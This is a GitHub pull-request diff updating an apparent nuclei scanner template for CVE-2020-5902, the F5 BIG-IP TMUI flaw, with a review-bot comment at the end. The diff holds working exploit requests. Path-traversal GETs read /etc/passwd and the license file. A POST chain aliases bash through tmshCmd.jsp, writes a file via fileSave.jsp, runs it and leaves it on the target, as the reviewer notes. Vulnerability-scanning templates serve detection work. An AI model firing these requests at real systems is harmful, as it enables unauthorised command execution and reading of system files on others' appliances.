Merge pull request #200 from dwisiswant0/update-cve-2020-5902

Update CVE-2020-5902 matchers & requests
patch-1
bauthard 2020-07-06 19:15:28 +05:30 committed by GitHub
commit 8ef6e99ab3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 44 additions and 1 deletions


@ -2,13 +2,16 @@ id: CVE-2020-5902
info:
name: F5 BIG-IP TMUI RCE
author: madrobot
author: madrobot & dwisiswant0
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
matchers-condition: and
matchers:
- type: status
status:
@ -16,4 +19,44 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0:"
- "BIG-IP release ([\\d.]+)"
- "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
condition: or
part: body
- raw:
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command={{url_encode("create cli alias private list command bash")}}
- |
POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
fileName={{url_encode("/tmp/nonexistent")}}&content={{url_encode("echo 'aDNsbDBfdzBSbGQK' | base64 -d")}}
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command={{url_encode("list /tmp/nonexistent")}}
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command={{url_encode("delete cli alias private list")}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "h3ll0_w0Rld"
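Review bot: The second request entry (L37–L69) turns this template from a read-only check into one that changes state on the target: it creates a `private list` cli alias, writes `/tmp/nonexistent` through fileSave.jsp and executes it, and the cleanup step on L61 only deletes the alias, so the written file stays behind on every host the template confirms. The first request already establishes the vulnerability through the fileRead.jsp matchers on L30–L36, so the command-execution chain adds impact without adding detection value; if it is kept, the side effect belongs in `info` so operators know what the template does before running it, e.g. `description: "Second request executes a tmsh command via tmshCmd.jsp and leaves /tmp/nonexistent on the target."`. As a smaller consistency point, the `word` matcher on L67–L69 omits `part: body` while the `regex` matcher on L36 states it; making both explicit keeps the two request blocks aligned. The `h3ll0_w0Rld` marker does match the base64 payload on L49 (it decodes to that string plus a newline), so the matcher itself is consistent.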